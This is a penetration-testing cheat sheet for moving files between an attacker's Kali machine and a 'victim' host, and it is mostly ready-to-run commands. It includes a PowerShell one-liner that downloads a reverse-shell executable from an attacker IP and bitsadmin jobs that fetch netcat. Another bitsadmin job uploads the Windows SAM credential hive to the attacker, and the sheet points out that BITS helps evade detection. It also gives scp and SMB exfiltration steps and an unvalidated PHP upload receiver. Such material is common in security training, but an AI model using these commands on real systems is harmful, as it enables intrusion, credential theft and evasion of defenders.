Cheat sheet for transferring (downloading/uploading) files between machines.
💡 On Windows, C:\ProgramData is often writable.
Web server
💡 Use updog, a replacement for SimpleHTTPServer that allows upload!
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.x
python3 -m http.server 80sudo service apache2 startTransfer binary files (convert to ascii)
Optional: Compress binary file
Use an executable packer (PE compression tool). The file is still executable after!
cd /home/kali/share
upx -9 nc.exeConvert binary file to ascii
exe2hex -x nc.exe -p nc.cmdTransfer the file using any other method.
Reconstruct the binary file
The last command is in Powershell and will reconstruct the binary file.
.\nc.cmdFTP
pip install pyftpdlibpython -m pyftpdlib -p 21 -wftp anonymous@x.x.x.xwget
Proxy configuration
nano /etc/wgetrchttp_proxy = http://127.0.0.1:3128
use_proxy = onDownload file in current directory
wget -O <local file name> <URL>
wget -O /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt" Download folder
wget -r "https://whatever/foldernameendingwithaslash/"curl
curl -o <local file name> <URL>
curl -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"axel
Download accelerator.
axel -a -n 20 -o <local file name> <URL>
axel -a -n 20 -o /usr/share/wordlists/quebec.txt "https://raw.githubusercontent.com/w0lf-d3n/Quebec_Wordlist/main/quebec.txt"netcat
See Netcat.
Powershell
See Powershell Cheat Sheet for more examples.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://IP/rev.exe','C:\ProgramData\rev.exe')"scp (secure copy)
scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2sudo service ssh startWindows (victim) to Kali
scp -r "C:\path\file.txt" kali@x.x.x.x:/home/kali/Linux (victim) to Kali
scp -r "/tmp/linpeas.txt" kali@x.x.x.x:/home/kali/Background Intelligent Transfer Service (BITS) on Windows
💡 Useful to evade detection since BITS is used for Windows Updates.
Download file
bitsadmin /create JOB & bitsadmin /addfile JOB <REMOTE_SRC> <LOCAL_DST> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOBbitsadmin /create JOB & bitsadmin /addfile JOB http://<KALI IP>/nc.exe %TEMP%\Data\nc.exe & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOBUpload file
bitsadmin /create /upload JOB & bitsadmin /addfile JOB <REMOTE_DST> <LOCAL_SRC> & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOBbitsadmin /create /upload JOB & bitsadmin /addfile JOB http://<KALI IP>/SAM %TEMP\Data\SAM & bitsadmin /resume JOB & timeout /T 10 & bitsadmin /complete JOBImpacket
See Impacket.
- Start SMB server on Kali Linux. See this post.
- On the Windows machine, copy file from Kali
💡 Supports binary file transfer. SEE ALSO impacket-wmiexec!!
On Kali
sudo impacket-smbserver myshare /home/kali/shareOn Windows
net view \\<KALI IP>dir \\<KALI IP>\<sharename>copy <source> <destination>copy <filename> \\<KALI IP>\<sharename>\<filename>copy \\<KALI IP>\<sharename>\<filename> <filename>PHP File Upload
On Kali, host a file upload page on Apache Web Server.
sudo mkdir /var/www/html/uploads
sudo chown www-data:www-data /var/www/html/uploads
sudo chmod 766 /var/www/html/uploadssudo service apache2 startupload.php
sudo nano /var/www/html/upload.php<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["targetfile"]["name"]);
move_uploaded_file($_FILES["targetfile"]["tmp_name"], $target_file)
?>upload.html
sudo nano /var/www/html/upload.html<html>
<head></head>
<body>
<form action="./upload.php" method="POST" enctype="multipart/form-data">
File<br>
<input type="file" name="targetfile"><br>
<input type="submit" name="submit" value="upload">
</form>
</body>
</html>On the victim
Open a web browser and go to http://<KALI_IP>/upload.html
powershell (New-Object System.Net.WebClient).UploadFile('http://x.x.x.x/upload.php', 'file.txt')